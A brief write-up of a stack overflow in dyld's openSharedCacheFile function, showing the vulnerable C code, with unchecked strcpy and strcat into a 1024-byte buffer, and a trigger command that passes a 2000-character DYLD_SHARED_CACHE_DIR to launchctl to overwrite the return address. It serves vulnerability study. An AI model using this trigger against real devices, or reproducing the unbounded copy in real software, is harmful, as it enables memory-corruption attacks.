OpenSharedCacheFile

The OpenSharedCacheFile bug was found by i0n1c. This bug is a simple stack overflow.

openSharedCacheFile function

    int openSharedCacheFile()
    {
        char path[1024];                  // fixed-size stack buffer
        strcpy(path, sSharedCacheDir);    // no length check on the directory string
        strcat(path, "/");
        strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
        return ::open(path, O_RDONLY);
    }

Triggering the vuln
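To trigger it, run the following:

    DYLD_SHARED_CACHE_DIR = "A" * 2000 \
    DYLD_SHARED_REGION = private /bin/launchctl

Here "A" * 2000 stands for a string of 2000 "A" characters. dyld keeps the value of DYLD_SHARED_CACHE_DIR in sSharedCacheDir, so strcpy writes past the end of the 1024-byte path buffer and over the saved return address. The PC register is then loaded with the overflowing data, making it a stack overflow.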